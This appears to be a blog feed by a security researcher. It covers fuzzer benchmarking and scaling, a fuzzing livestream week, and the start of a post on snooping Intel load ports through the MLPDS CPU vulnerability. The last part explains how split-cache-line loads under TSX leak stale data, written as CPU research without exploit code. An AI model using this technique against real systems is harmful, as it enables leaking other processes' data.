<p>However, in reality, the scaling of these tools is critical for actual use. If AFL is 20% faster single-core, that’ll likely make it show up at the top of <a href="https://github.com/google/fuzzbench">fuzzbench</a>, given relative parity of mutation strategies. That’s great, the performance takes engineering effort and should not be undervalued. In fact, most of my research is focused around making fuzzers fast, I’ve got multiple fuzzers that can handle 10s of billions of fuzz cases per second on a single machine. It’s a lot of work to make these tools scale, much more so than single-core performance, which is often algorithmic fixes.</p>
<p>If AFL is 20% faster single-core but bottlenecks on <code class="language-plaintext highlighter-rouge">fork()</code> or <code class="language-plaintext highlighter-rouge">write()</code>, and thus only scales to 20-30 cores (often where I see AFL really fall apart on medium-size targets; 5-10 cores for small targets), while something like libfuzzer manages things in memory and can scale linearly with as many cores as you throw at it, then libfuzzer is going to blow away any 20% performance gains seen single-core.</p>
<p>This information is very hard to benchmark. Well, not hard, but costly. Effectively, I’d like to see benchmarks of fuzzers scaled to ~16 cores on a single server, and ~128 cores distributed across at least 4 servers. This benchmarks: A. whether the fuzzer can scale in the first place (if it can’t, that’s a big hit to real-world usability); B. whether it can scale across servers, often over the network (things like AFL-over-SMB would have brutal scaling properties here); and C. the scaling properties between cores on the same server, and how they transfer over the network.</p>
<p>I find it very unlikely that these fuzzers being benchmarked even remotely have similar scaling properties. AFL struggles to scale even on a single server, even in persistent mode, due to the heavy use of syscalls and blocking IPC on every fuzz case (<code class="language-plaintext highlighter-rouge">signal()</code>, <code class="language-plaintext highlighter-rouge">read()</code>, <code class="language-plaintext highlighter-rouge">write()</code>; IIRC ~3-4 syscalls per case).</p>
<p>Scaling also puts a lot of pressure on infeasible fuzzing strategies proposed in papers. We’ve all seen them, the high-introspection techniques which extract memory, register, and taint state from a small program and promise great results. I don’t disagree with the results; the amount of information you extract pretty much directly correlates with an increase in coverage/case. But, eventually the data load gets very hard to share between cores, queue between servers, and even just process.</p>
<h1 id="measuring-symbolic">Measuring symbolic</h1>
<p>Measuring symbolic was brought up a few times, as it would definitely have a much better coverage/case than a traditional fuzzer. But this nuance can easily be handled by looking at both coverage/case and coverage/time graphs. Learning what works well algorithmically should drive our engineering efforts to solve problems. While symbolic may have huge performance issues, it’s very likely that many of the parts of it (eg. taint tracking) can be approximated with lossy algorithms and data capturing, and it’s more about learning where it has strengths and weaknesses. Many of the analyses I’ve done on symbolic largely lead me to vectorized emulation, which allows for highly-compressed, approximated taint tracking, while still getting near-native (or even better) execution speeds.</p>
<h1 id="the-case-against-monolithic-fuzzers">The case against monolithic fuzzers</h1>
<p>Learning what works is important to figure out where to invest our engineering time. Given the quality of code in fuzzing right now (often very poor), there’s a lot of things that I’d hate to see us rule out because our current methodologies do not support them. I really care about fuzz case reset times (often: the <code class="language-plaintext highlighter-rouge">fork()</code> costs), as well as determinism. In a fully deterministic environment, with fast resets, a lot of approximate strategies can be used. Trying to approximate where bytes came from in an input, flipping the bytes because you have a branch target which is interesting, and then smashing those bytes in can give good information about the relation of those bytes to the input. Hell, with fast resets and forking, you can do partial fuzzing where you <code class="language-plaintext highlighter-rouge">fork()</code> and snapshot multiple times during a fuzz case, and you can progressively fuzz “from” different points in the parser. This works especially well for protocols where you can snapshot at each packet boundary.</p>
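<p>A toy sketch of that partial-fuzzing idea using plain <code class="language-plaintext highlighter-rouge">fork()</code> — at each packet boundary the child inherits all parser state built so far and fuzzes only the remainder. The stage function and packet layout here are made up for illustration; this is not how any particular fuzzer implements it:</p>

```python
import os

def parse_stage(packet):
    # Stand-in for one stage of a packet parser; "crashes" (fails) on a
    # magic byte. A real harness would run the target code here.
    return packet != b"\xff"

def snapshot_fuzz(packets):
    # At each packet boundary, fork(): the child inherits all parser
    # state accumulated so far and fuzzes "from" this point, while the
    # parent continues on to take the next snapshot.
    children = []
    for i, pkt in enumerate(packets):
        pid = os.fork()
        if pid == 0:
            # Child: run (or mutate-and-run) only the remaining packets
            ok = all(parse_stage(p) for p in packets[i:])
            os._exit(0 if ok else 1)
        children.append(pid)
        parse_stage(pkt)  # Parent: advance the real parser state
    # Collect child exit statuses (0 = no "crash" in the remainder)
    return [os.WEXITSTATUS(os.waitpid(pid, 0)[1]) for pid in children]
```

Each snapshot point costs one <code class="language-plaintext highlighter-rouge">fork()</code> instead of a full re-parse from the start of the input, which is the whole appeal for deep protocol states.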
<p>These sorts of techniques and analyses don’t really work when we have monolithic fuzzers. The performance of existing fuzzers is often quite poor (AFL <code class="language-plaintext highlighter-rouge">fork()</code>, etc), or does not support partial execution (persistent modes, libfuzzer, etc). This leads to us not being able to even research these techniques. As we keep bolting things onto existing fuzzers and treating them like big blobs, we’ll get further and further from being able to learn the isolated properties of fuzzers and find the best places to apply certain strategies.</p>
<h1 id="why-i-dont-care-much-about-fuzzer-performance-for-benchmarking">Why I don’t care much about fuzzer performance for benchmarking</h1>
<h4 id="reset-speed">Reset speed</h4>
<p>AFL <code class="language-plaintext highlighter-rouge">fork()</code> bottlenecks for me often around 10-20k execs/sec on a single core, and about 40-50k on the whole system, even with 96C/192T systems. This is largely due to just getting stuck on kernel allocations and locks. Spinning up processes is expensive, and largely out of our control. AFL allows access to the local system and kernel from the fuzz case, thus cases are not deterministic, nor are they isolated (in the case of fuzzing something with lock files). This requires using another abstraction layer like docker, which adds more overhead to the equation. My hypervisors that I use for fuzzing can reset a Windows VM 1 million times per second on a single core, and scale linearly with cores, while being deterministic. Why does this matter? Well, we’re comparing tooling which isn’t even remotely hitting the capabilities of the CPUs; rather, it’s bottlenecking on the kernel. These are solvable problems, and thus, as a consumer of good ideas but not tooling, I’m interested in what works well. I can make it go fast myself.</p>
<h4 id="determinism">Determinism</h4>
<p>Most fuzzers that we work with now are not deterministic. You cannot expect instruction-for-instruction determinism between cases. This makes it a lot harder to use complex fuzzing strategies which may rely on the results of a prior execution being identical to a future one. This is largely an engineering problem, and can be solved in both system-level and app-level targets.</p>
<h4 id="mutation-performance">Mutation performance</h4>
<p>The performance of mutators is often not what it could be. For example, <a href="https://github.com/google/honggfuzz">honggfuzz</a> used (now fixed, cheers!) temporary allocations during multiple passes. During its <code class="language-plaintext highlighter-rouge">mangle_MemSwap</code> it made a copy of the chunk that was to be swapped, performing 3 memcpys and using a temporary allocation. This logic was able to be implemented using a single memcpy and without a dynamic allocation. This is not a criticism of <a href="https://github.com/google/honggfuzz">honggfuzz</a>, but more of an important note of how development often occurs. Early prototyping, success, and rare revisiting of what can be changed. What’s my point here? Well, the mutation strategies in many fuzzers may introduce timing properties that are not fundamentally required to have identical behaviors. There’s nothing wrong with this, but it is additional noise which factors into time-based benchmarks. This means a good strategy can be hurt by a bad implementation, or just a naive one that was done early on. This is noise that I think is important to remove from analysis so that we can learn what ideas work, and engineer them later.</p>
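<p>As an illustration (a sketch, not honggfuzz’s actual fix), an equal-length chunk swap can avoid the temporary allocation entirely by exchanging bytes pairwise in a single pass:</p>

```python
def swap_chunks_inplace(buf, a, b, size):
    # Swap two non-overlapping, equal-length chunks of a bytearray in
    # place. No scratch buffer is allocated: each byte pair is exchanged
    # directly, instead of three memcpy()s through a temporary copy.
    assert a + size <= b or b + size <= a, "chunks must not overlap"
    for i in range(size):
        buf[a + i], buf[b + i] = buf[b + i], buf[a + i]

buf = bytearray(b"foobarbaz")
swap_chunks_inplace(buf, 0, 6, 3)  # swap "foo" and "baz"
```

The same behavior, identical output, but a very different timing profile — exactly the kind of implementation noise that leaks into time-based benchmarks.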
<p>Further, I don’t know of any mutational fuzzer which doesn’t mutate in-place. This means the multiple splices and removals from an input must end up <code class="language-plaintext highlighter-rouge">memcpy()</code>ing the remainder. This is a very common mutation pass. This means the fuzzer slows down dramatically with respect to the input file size, something we see almost every fuzzer put insane restrictions on (AFL has a fit if you give it anything but a tiny file).</p>
<p>There’s nothing stopping us from making a tree-based fuzzer where a splice adds a node to the tree and updates metadata on other nodes. The input could be serialized once when it’s ready to be consumed, or even better, serialized on-demand, only providing the parts of the file which actually were used during the fuzz case.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Example:
Initial input: "foobar", tree is [pointer to "foobar", length 6]
Splice "baz" at 3: [pointer to "foo", length 3][pointer to "baz", length 3][pointer to "bar", length 3]
Program read()s 3 bytes, return "foo" without serializing the rest
Program crashes, tree can be saved or even just what has read can be saved
</code></pre></div></div>
<p>In this, the cost is N updates to some basic metadata, where N is the number of mutations performed on that input (often 5-10). On a new fuzz case, you start with an initial input in one node of the tree, and you can once again split it up as needed. Pretty much no <code class="language-plaintext highlighter-rouge">memcpys()</code> need to be performed, nor allocations, as the input can be extended such that in-memory it’s “foobarbaz”, but the metadata describes that the “baz” should come between “foo” and “bar”.</p>
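<p>A minimal sketch of this idea in Python, matching the “foobar”/“baz” example above — nodes are (buffer, offset, length) triples, a splice only touches metadata, and serialization happens lazily as the target reads:</p>

```python
class TreeInput:
    """Sketch of a splice-based input: a list of (buffer, offset, length)
    nodes instead of one flat byte array. A splice is pure metadata; no
    bytes are copied until the target actually reads them."""

    def __init__(self, data):
        self.nodes = [(data, 0, len(data))]

    def splice(self, pos, data):
        # Split the node containing `pos` and slot the new chunk between
        # the two halves; cost is O(number of nodes), not O(input size).
        out = []
        consumed = 0
        for buf, off, ln in self.nodes:
            if consumed <= pos <= consumed + ln:
                cut = pos - consumed
                if cut:
                    out.append((buf, off, cut))
                out.append((data, 0, len(data)))
                if ln - cut:
                    out.append((buf, off + cut, ln - cut))
                pos = -1  # already placed; don't match again
            else:
                out.append((buf, off, ln))
            consumed += ln
        self.nodes = out

    def read(self, n):
        # Serialize on demand: only the first n bytes the target actually
        # consumes are ever flattened into a contiguous buffer.
        out = bytearray()
        for buf, off, ln in self.nodes:
            out += buf[off:off + min(ln, n - len(out))]
            if len(out) == n:
                break
        return bytes(out)
```

With this, splicing “baz” at offset 3 of “foobar” never copies “bar” anywhere; a <code class="language-plaintext highlighter-rouge">read()</code> of 3 bytes returns “foo” without serializing the rest.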
<p>Restructuring the way we do mutations like this allows us to probably easily find 10x improvements in mutator performance (read, not overall fuzzer performance). Meaning, I don’t really want the cost of the mutator to be part of the equation, because once again, it’s likely a result of laziness or simplicity. If something really brings a strategy to the table that is excellent, we can likely make it work just as fast (but likely even faster), than existing strategies.</p>
<p>Not to mention the value in potentially knowing which mutations were used during prior cases, and that you could potentially mutate this tree (eg, change a splice from 5 bytes to 8 bytes, without changing the offset, just changing the node in the mutation tree). This could also be used as a mechanism to dynamically weight mutation strategies based on yields, while still getting a performance <em>gain</em> over the naive implementation.</p>
<h4 id="performance-conclusion">Performance conclusion</h4>
<p>From previous work with fuzzers, most of the reset, overhead, and corruption logic is likely not even within an order of magnitude of the possible performance. Thus, I’m far more interested in figuring out what and where strategies work, as the implementations of them are typically not indicative of their performance.</p>
<p>BUT! I recognize the value in treating them as whole systems. I’m a bit more on the hard-core engineering side of the problem. I’m interested in which strategies work, not which tools. There’s definitely value in knowing which tools will work best, given you don’t have the time to tweak or rebuild them yourself. That being said, I think scaling is much more important here, as I don’t really know of anyone doing single-core fuzzing. The results of these fuzzers at scale are likely dramatically different from single-core, and would put some major pressure on some more theoretical ideas which produce way too much information to consume and handle.</p>
<h1 id="reconstructing-the-full-picture-from-data">Reconstructing the full picture from data</h1>
<p>The data I would like to see <a href="https://github.com/google/fuzzbench">fuzzbench</a> give, and I’d give you some massive props for doing it, would be the raw, microsecond-timestamped information for each coverage gained.</p>
<p>This means, every time coverage increases, a new CSV record (or whatever format) is generated, including the time stamp when it was found (to the microsecond), as well as the fuzz iteration ID which indicates how many inputs have been run into the fuzzer. This should also include a unique identifier of the block which was found.</p>
<p>This means, in post, the entire progress of the fuzzer can be reconstructed. Every edge, which edges they were, the times they were found, and the case ID they were on when they were found allows comparing not only the raw “edge count” but also the differences between edges found. It’s crazy that this information is not part of the benchmark, as almost all the fuzzers could be finding nearly the same coverage, but a fuzzer which finds less coverage, but completely unique edges, would be devalued.</p>
<p>This is the firehose of data, but since it’s not collected on an interval, it very quickly turns into almost no data.</p>
<h4 id="hard-problem-what-is-coverage">Hard problem: What is coverage?</h4>
<p>This leads to a really hard problem. How do we compare coverage between tools? Can we safely create a unique block identifier which is universal between all the fuzzers and their targets? I have no idea how <a href="https://github.com/google/fuzzbench">fuzzbench</a> solves this (or even if it does). If <a href="https://github.com/google/fuzzbench">fuzzbench</a> is relying on the fuzzers to have roughly the same idea of what an edge is, I’d say the results are completely invalid. Having different passes which add different coverage-gathering or comparison instrumentation could easily affect the graphs. Even just non-determinism in clang (or whatever compiler) would make me uneasy about whether <code class="language-plaintext highlighter-rouge">afl-clang</code> binaries have identical graph shapes to <code class="language-plaintext highlighter-rouge">libfuzzer-clang</code> binaries.</p>
<p>If <a href="https://github.com/google/fuzzbench">fuzzbench</a> does solve this problem, I’m curious as to how. I’d anticipate it would be through a coverage pass which is standardized between all targets. If this is the case, are they using the same binaries? If they’re not, are the binaries deterministic, or can the fuzzers affect the benchmark coverage information due to adding their own compiler instrumentation.</p>
<p>Further, if this is the case, it makes it much harder to compare emulators or other tools which gather their own coverage in a unique way. For example, if my emulators, which get coverage for effectively free, had to run an instrumented binary for <a href="https://github.com/google/fuzzbench">fuzzbench</a> to get data, it’s not a realistic comparison. My fuzzer would be penalized twice for coverage gathering, even though it doesn’t need the instrumented binary.</p>
<p>Maybe someone solved this problem, and I’m curious what the solution is. TL;DR: Are we actually comparing the same binaries with identical graphs, and is this fair to fuzzers which do not need compile-time instrumentation?</p>
<h1 id="the-end">The end</h1>
<p>Can’t wait for more discussion. You have been very receptive even when I’m often a bit strongly opinionated. I respect that a lot.</p>
<p>Stay cute,</p>
<p>gamozo</p>ForewardFuzz Week 20202020-07-12T07:11:15+00:002020-07-12T07:11:15+00:00https://gamozolabs.github.io/2020/07/12/fuzz_week_2020<h1 id="summary">Summary</h1>
<p>Welcome to fuzz week 2020! This week (July 13th - July 17th) I’ll be streaming
every day going through some of the very basics of fuzzing all the way to
cutting edge research. I want to use this time to talk about some things
related to fuzzing, particularly when it comes to benchmarking and comparing
fuzzers with each other.</p>
<h1 id="schedule">Schedule</h1>
<p>Ha. There’s really no schedule, there is no script, there is no plan, but
here’s a rough outline of what I want to cover.</p>
<p>I will be streaming on my <a href="https://twitch.tv/gamozo">Twitch channel</a> at approximately
<a href="https://www.timeanddate.com/worldclock/fixedtime.html?msg=Fuzz+Week+Approx+Stream+Start&iso=20200713T14&p1=234">14:00 PST</a>. But things aren’t really going to be on a strict schedule.</p>
<p>My <a href="https://twitter.com/gamozolabs">Twitter</a> is probably the best source of information for when
things are about to start.</p>
<p>Everything will be recorded and uploaded to my <a href="https://www.youtube.com/user/gamozolabs">YouTube</a>.</p>
<h4 id="july-13th">July 13th</h4>
<p>The very basics of fuzzing. We’ll write our own fuzzer and tweak it to improve
it. We’ll probably start by writing it in Python, and eventually talk about the
performance ramifications and the basics of scaling fuzzers by using threads or
multiple processes. We’ll also compare our newly written fuzzer against AFL and
see where AFL outperforms it, and also where AFL has some blind spots.</p>
<h4 id="july-14th">July 14th</h4>
<p>Here we’ll cover code coverage. We might get to this sooner, who knows. But
we’re going to write our own tooling to gather code coverage information such
that we can see not only how easy it is to set up, but how flexible coverage
information can be while still proving quite useful!</p>
<h4 id="july-15th-17th">July 15th-17th</h4>
<p>Here we’ll focus mainly on the advanced aspects of fuzzing. While this sounds
complex, fuzzing really hasn’t become that complex yet, so follow along! We’ll
go through some of the more deep performance properties of fuzzing, mainly
focused around snapshot fuzzing.</p>
<p>Once we’ve discussed some basics of performance and snapshot fuzzing, we’ll
start talking about the meaningfulness of comparing fuzzers. Namely, the
difficulties in comparing fuzzers when they may involve different concepts of
what a crash, coverage, or input are. We’ll look at some existing examples of
papers which compare fuzzers, and see how well they actually prove their point.</p>
<h1 id="biases">Biases</h1>
<p>I think it’s important when doing something like this, to make it clear what my
existing biases are. I’ve got a few.</p>
<ul>
<li>I think existing fuzzers have some major performance problems and struggle to
scale. I consider this to be a high priority as general performance
improvements to fuzzing harnesses makes both generic fuzzers (eg. AFL,
context-unaware fuzzers) and hand-crafted (targeted) fuzzers better.</li>
<li>I don’t think outperforming AFL is impressive. AFL is impressive because it’s
got an easy-to-use workflow, which makes it accessible to many different
users, broadening the amount of targets it has been used against.</li>
<li>I don’t really think comparing fuzzers is reasonable.</li>
<li>I think it is very easy to over-fit a fuzzer to small programs, or add
unrealistic amounts of information extraction from a target under test, in a
way that the concepts are not generally applicable to many targets that
exceed basic parsers. I think this is where a lot of current research falls.</li>
</ul>
<p>But… that’s mainly the point of this week. To either find out my biases are
wildly incorrect, or to maybe demonstrate why I have some of the biases. So,
how will I address some of these (in order of prior bullets)?</p>
<ul>
<li>I’ll compare some of my fuzzers against AFL. We’ll see if we can outperform
AFL in terms of raw fuzz cases performed, as well as the results (coverage
and crashes).</li>
<li>I’ll try to demonstrate that a basic fuzzer with 1/100th the amount of code
of AFL is capable of getting much better results, and that it’s really not
that hard to write.</li>
<li>I’ll propose some techniques that can be used to compare fuzzers, and go
through my own personal process of evaluating fuzzers. I’m not trying to get
papers, or funding, or anything. I don’t really have an interest in making
things look comparatively better. If they perform differently, but have
different use cases, I’d rather understand those cases and apply them
specifically rather than have a one-shoe-fits-all solution.</li>
<li>I’ll go through some instrumentation that I’ve historically added to my
fuzzers which give them massive result and coverage boosts, but consume so
much information that they cannot meaningfully scale past tiny pieces of
code. I’ll go through when these things may actually be useful, as sometimes
isolating components is viable. I’ll also go through some existing papers and
see what sorts of results are being claimed, and if they actually have
general applicability.</li>
</ul>
<h1 id="winging-it">Winging it</h1>
<p>It’s important to note, nothing here is scheduled. Things may go much faster,
slower, or just never happen. That’s the beauty of research. I may be very
wrong with some of my biases, and we’ll hopefully correct those. I love being
wrong.</p>
<p>I’ve maybe thought of having some fuzzing figureheads pop on the stream for
random discussions/conversations/interviews. If this is something that sounds
interesting to you, reach out and we can maybe organize it!</p>
<h1 id="sound-fun">Sound fun?</h1>
<p>See you there :)</p>
<hr />SummaryCPU Introspection: Intel Load Port Snooping2019-12-30T04:11:15+00:002019-12-30T04:11:15+00:00https://gamozolabs.github.io/metrology/2019/12/30/load-port-monitor<p><img src="/assets/loadseq_example.png" alt="Load sequence example" /></p>
<p><em><sub>Frequencies of observed values over time from load ports. Here we’re
seeing the processor internally performing a microcode-assisted page table walk
to update accessed and dirty bits. Only one load was performed by the user,
these are all “invisible” loads done behind the scenes</sub></em></p>
<h1 id="twitter">Twitter</h1>
<p>Follow me at <a href="https://twitter.com/gamozolabs">@gamozolabs</a> on Twitter if you want notifications when
new blogs come up. I often will post data and graphs from data as it comes in
and I learn!</p>
<hr />
<h1 id="foreward">Foreward</h1>
<p>First of all, I’d like to say that I’m super excited to write up this blog.
This is an idea I’ve had for over a year and I only recently got to working on.
The initial implementation and proof-of-concept of this idea was actually
implemented live on my <a href="https://twitch.tv/gamozo">Twitch</a>! This proof-of-concept went from
nothing at all to a fully-working-as-predicted implementation in just about 3
hours! Not only did the implementation go much smoother than expected, the
results are by far higher resolution and signal-to-noise than I expected!</p>
<p>This blog is fairly technical, and thus I highly recommend that you read my
<a href="/metrology/2019/08/19/sushi_roll.html">previous blog on Sushi Roll</a>, my CPU research kernel where this
technique was implemented. In the Sushi Roll blog I go a little bit more into
the high-level details of Intel micro-architecture and it’s a great
introduction to the topic if you’re not familiar.</p>
<p><a href="https://www.youtube.com/watch?v=_oE4_ShKQL8"><img src="https://img.youtube.com/vi/_oE4_ShKQL8/0.jpg" alt="YouTube video for PoC
implementation" /></a></p>
<p><em><sub>Recording of the stream where we implemented this idea as a
proof-of-concept. Click for the YouTube video!</sub></em></p>
<hr />
<h1 id="summary">Summary</h1>
<p>We’re going to go into a unique technique for observing and sequencing all load
port traffic on Intel processors. By using a CPU vulnerability from the MDS set
of vulnerabilities, specifically microarchitectural load port data sampling
(MLPDS, CVE-2018-12127), we are able to observe values which fly by on the load
ports. Since (to my knowledge) all loads must end up going through load ports,
regardless of requestor, origin, or caching, this means in theory, all contents
of loads ever performed can be observed. By using a creative scanning
technique we’re able to not only view “random” loads as they go by, but
sequence loads to determine the ordering and timing of them.</p>
<p>We’ll go through some examples demonstrating that this technique can be used to
view all loads as they are performed on a cycle-by-cycle basis. We’ll look
into an interesting case of the micro-architecture updating accessed and dirty
bits using a microcode assist. These are invisible loads dispatched on the CPU
on behalf of the user when a page is accessed for the first time.</p>
<h1 id="why">Why</h1>
<p>As you may be familiar, x86 is quite a complex architecture with many nooks and
crannies. As time has passed it has only gotten more complex, leading to fewer
known behaviors of the inner workings. There are many instructions with complex
microcode invocations which access memory as were seen through my work on Sushi
Roll. This led to me being curious as to what is actually going on with load
ports during some of these operations.</p>
<p><img src="/assets/graph_write_nodirtyupdate.png" alt="Intel CPU traffic during a normal
write" /></p>
<p><em><sub>Intel CPU traffic on load ports (ports 2 and 3) and store ports (port 4)
during a traditional memory write</sub></em></p>
<p><img src="/assets/graph_write_dirtyupdate.png" alt="Intel CPU traffic during a write requiring dirty/accessed
updates" /></p>
<p><em><sub>Intel CPU traffic on load ports (ports 2 and 3) and store ports (port 4)
during the same memory write as above, but this time where the page table
entries need an accessed/dirty bit update</sub></em></p>
<p>Beyond just directly invoked microcode due to instructions being executed,
microcode also gets executed on the processor during “microcode assists”. These
operations, while often undocumented, are referenced a few times throughout
Intel manuals. Specifically in the Intel Optimization Manual there are
references to microcode assists during accessed and dirty bit updates. Further,
there is a restriction on TSX sections such that they may abort when accessed
and dirty bits need to be updated. These microcode assists are fascinating to
me, as while I have no evidence for it, I suspect they may be subject to
different levels of permissions and validations compared to traditional
operations. Whenever I see code executing on a processor as a side-effect to
user operations, all I think is: “here be dragons”.</p>
<hr />
<h1 id="a-playground-for-cpu-bugs">A playground for CPU bugs</h1>
<p>When I start auditing a target, the first thing that I try to do is get
introspection into what is going on. If the target is an obscure device then
I’ll likely try to find some bug that allows me to image the entire device, and
load it up in an emulator. If it’s some source code I have that is partial,
then I’ll try to get some sort of mocking of the external calls it’s making and
implement them as I come by them. Once I have the target running on <em>my</em> terms,
and not the terms of some locked down device or environment, then I’ll start
trying to learn as much about it as possible…</p>
<p>This is no different from what I did when I got into CPU research. Starting
with when Meltdown and Spectre came out I started to be the go-to person for
writing PoCs for CPU bugs. I developed a few custom OSes early on that were
just designed to give a pass/fail indicator if a CPU bug were able to be
exploited in a given environment. This was critical in helping test the
mitigations that went in place for each CPU bug as they were reported, as
testing if these mitigations worked is a surprisingly hard problem.</p>
<p>This led to me having some cleanly made OS-level CPU exploits written up. The
custom OS proved to be a great way to test the mitigations, especially as the
signal was much higher compared to a traditional OS. In fact, the signal was
almost just a bit too strong…</p>
<p>When in a custom operating system it’s a lot easier to play around with weird
behaviors of the CPU, without worrying about it affecting the system’s
stability. I can easily turn off interrupts, overwrite exception handlers with
specialized ones, change MSRs to weird CPU states, and so on. This led to me
ending up with almost a playground for CPU vulnerability testing with some
pretty standard primitives.</p>
<p>As the number of primitives I had grew, I was able to PoC out a new CPU bug in
typically under a day. But then I had to wonder… what would happen if I tried
to get the most information out of the processor as possible.</p>
<hr />
<h1 id="sushi-roll">Sushi Roll</h1>
<p>And that was the starting of Sushi Roll, my CPU research kernel. I have a whole
<a href="/metrology/2019/08/19/sushi_roll.html">blog about the Sushi Roll research kernel</a>, and I strongly
recommend you read it! Effectively Sushi Roll is a custom kernel with message
passing between cores rather than memory sharing. This means that each core has
a complete copy of the kernel with no shared accesses. For attacks which need
to observe the faintest signal in memory behaviors, this leads to a great amount
of isolation.</p>
<p>When looking for a behavior you already understand on a processor, it’s pretty
easy to get a signal. But, when doing initial CPU research into the unknowns
and undefined behavior, getting this signal out takes every advantage as you
can get. Thus in this low-noise CPU research environment, even the faintest
leak would cause a pretty large disruption in determinism, which would likely
show up as a measurable result earlier than traditional blind CPU research
would allow.</p>
<h4 id="performance-counter-monitoring">Performance Counter Monitoring</h4>
<p>In Sushi Roll I implemented a creative technique for monitoring the values in
performance counters along with time-stamping them in cycles. Some of the
performance counters in Intel processors count things like the number of
micro-ops dispatched to each of the execution units on the core. Some of these
counters increase during speculation, and with this data and time-stamping I was
able to get some of the first-ever insights into what processor behavior was
actually occurring during speculation!</p>
<p><img src="/assets/example_profiling.png" alt="Example uarch activity" />
<em><sub>Example cycle-by-cycle profiling of the Kaby Lake micro-architecture,
warning: log-scale y-axis</sub></em></p>
<p>Being able to collect this sort of data immediately made unexpected CPU
behaviors easier to catalog, measure, and eventually make deterministic. The
more understanding we can get of the internals of the CPU, the better!</p>
<hr />
<h1 id="the-ultimate-goal">The Ultimate Goal</h1>
<p>The ultimate goal of my CPU research is to understand so thoroughly how the
Intel micro-architecture works that I can predict it with emulation models.
This means that I would like to run code through an emulated environment and it
would tell me exactly how many internal CPU resources would be used, which
lines from caches and buffers would be evicted and what contents they would
hold. There’s something beautiful to me to understanding something so well that
you can predict how it will behave. And so the journey begins…</p>
<h1 id="past-progress">Past Progress</h1>
<p>So far with the work in Sushi Roll we’ve been able to observe how the CPU
dispatches uops during specific portions of code. This allows us to see which
CPU resources are used to fulfill certain requests, and thus can provide us
with a rough outline of what is happening. With simple CPU operations this is
often all we need: since there are only so many ways to perform a certain
operation, the complete picture can usually be drawn just from guessing “how
they might have done it”. However, when more complex operations are involved,
all of that goes out the window.</p>
<p>When reading through Intel manuals I saw many references to microcode assists.
These are “situations” in your processor which may require microcode to be
dispatched to execution units to perform some complex-ish logic. These are
typically edge cases which don’t occur frequently enough for the processor to
worry about handling them in hardware, rather just needing to detect them and
cause some assist code to run. We know of one microcode assist which is
relatively easy to trigger, updating the accessed and dirty bits in the page
tables.</p>
<h4 id="accessed-and-dirty-bits">Accessed and dirty bits</h4>
<p>In the Intel page table (and honestly most other architectures) there’s a
concept of accessed and dirty bits. These bits indicate whether or not a page
has ever been translated (accessed), or if it has been written to (dirtied). On
Intel it’s a little strange as there is only a dirty bit on the final page
table entry. However, the accessed bits are present on each level of the page
table during the walk. I’m quite familiar with these bits from my work with
hypervisor-based fuzzing as it allows high performance differential resetting
of VMs by simply walking the page tables and restoring pages that were dirtied
back to their original snapshot state.</p>
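<p>To make these bits concrete, here is a small sketch (my own illustration, not code from Sushi Roll) of how a canonical 48-bit virtual address decomposes into the four 9-bit indices used at each level of the walk, along with the masks for the accessed (<code class="language-plaintext highlighter-rouge">0x20</code>) and dirty (<code class="language-plaintext highlighter-rouge">0x40</code>) bits:</p>

```rust
// Sketch (my own illustration): the standard x86-64 4-level walk decomposition
const PAGE_ACCESSED: u64 = 1 << 5; // the 0x20 "A" bit, present at every level
const PAGE_DIRTY: u64 = 1 << 6; // the 0x40 "D" bit, meaningful on the final PTE

fn walk_indices(vaddr: u64) -> [u64; 4] {
    [
        (vaddr >> 39) & 0x1ff, // PML4 index
        (vaddr >> 30) & 0x1ff, // PDPT index
        (vaddr >> 21) & 0x1ff, // PD index
        (vaddr >> 12) & 0x1ff, // PT index
    ]
}

fn main() {
    // The virtual address used in the examples later in this post
    let idx = walk_indices(0x700d_feed_0000);
    println!("PML4={} PDPT={} PD={} PT={}", idx[0], idx[1], idx[2], idx[3]);
    println!("accessed mask {:#x}, dirty mask {:#x}", PAGE_ACCESSED, PAGE_DIRTY);
}
```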
<p>But this leads to a curiosity… what is the mechanism responsible for setting
these bits? Does the internal page table silicon set these during a page table
walk? Are they set after the fact? Are they atomically set? Are they set during
speculation or faulting loads?</p>
<p>From Intel manuals and some restrictions with TSX it’s pretty obvious that
accessed and dirty bits are a bit of an anomaly. TSX regions will abort when
memory is touched that does not have the respective accessed or dirty bits set.
That’s strange: why would this be a limitation of the processor?</p>
<p><img src="/assets/tsx_intel_manual.png" alt="TSX aborts during accessed and dirty bit
updates" /></p>
<p><em><sub>Accessed and dirty bits causing TSX aborts from the Intel® 64 and IA-32
architectures optimization reference manual</sub></em></p>
<p>… weird huh? Testing it out yields exactly what the manual says. If I write
up some sample code which accesses memory that doesn’t have the respective
accessed or dirty bits set, it aborts <em>every time</em>!</p>
<h1 id="whats-next">What’s next?</h1>
<p>So now we have an ability to view what operation types are being performed on
the processor. However this doesn’t tell us a huge amount of information. What
we would really benefit from would be knowing the data contents that are being
operated on. We can pretty easily log the data we are fetching in our own
code, but that won’t give us access to the internal loads that happen as side
effects on the processor, nor would it tell us about the contents of loads
which happen during speculation.</p>
<p>Surely there’s no way to view all loads which happen on the processor right?
Almost anything during speculation is a pain to observe, and even if we could
observe the data it’d be quite noisy.</p>
<p>Or maybe there is a way…</p>
<h1 id="-a-way">… a way?</h1>
<p>Fortunately there may indeed be a way! A while back I found a CPU
vulnerability which allowed for random values to be sampled off of the load
ports. While this vulnerability is initially thought to only allow for random
values to be sampled from the load ports, perhaps we can get a bit more
creative about leaking…</p>
<hr />
<h1 id="multi-architectural-load-port-data-sampling-mlpds">Multi-Architectural Load Port Data Sampling (MLPDS)</h1>
<p>Multi-architectural load port data sampling sounds like an overly complex name,
but it’s actually quite simple in the end. It’s a set of CPU flaws in Intel
processors which allow a user to potentially get access to stale data recently
transferred through load ports. This was actually a bug that I reported to
Intel a while back and they ended up finding a few similar issues with
different instruction combinations, this is ultimately what comprises MLPDS.</p>
<p><img src="/assets/mlpds_intel_desc.png" alt="MLPDS Intel Description" /></p>
<p><em>Description of MLPDS from <a href="https://software.intel.com/security-software-guidance/insights/deep-dive-intel-analysis-microarchitectural-data-sampling">Intel’s MDS DeepDive</a></em></p>
<p>The specific bug that I found was initially called “cache line split” or “cache
line split load” and it’s exactly what you might expect: a data access which
straddles a cache line (a multi-byte load containing some bytes on one cache
line and the remaining bytes on another). Cache lines are 64 bytes in size, so any
multi-byte memory access to an address with the bottom 6 bits set would cause
this behavior. These accesses must also cause a fault or an assist, but by
using TSX it’s pretty easy to get whatever behavior you would like.</p>
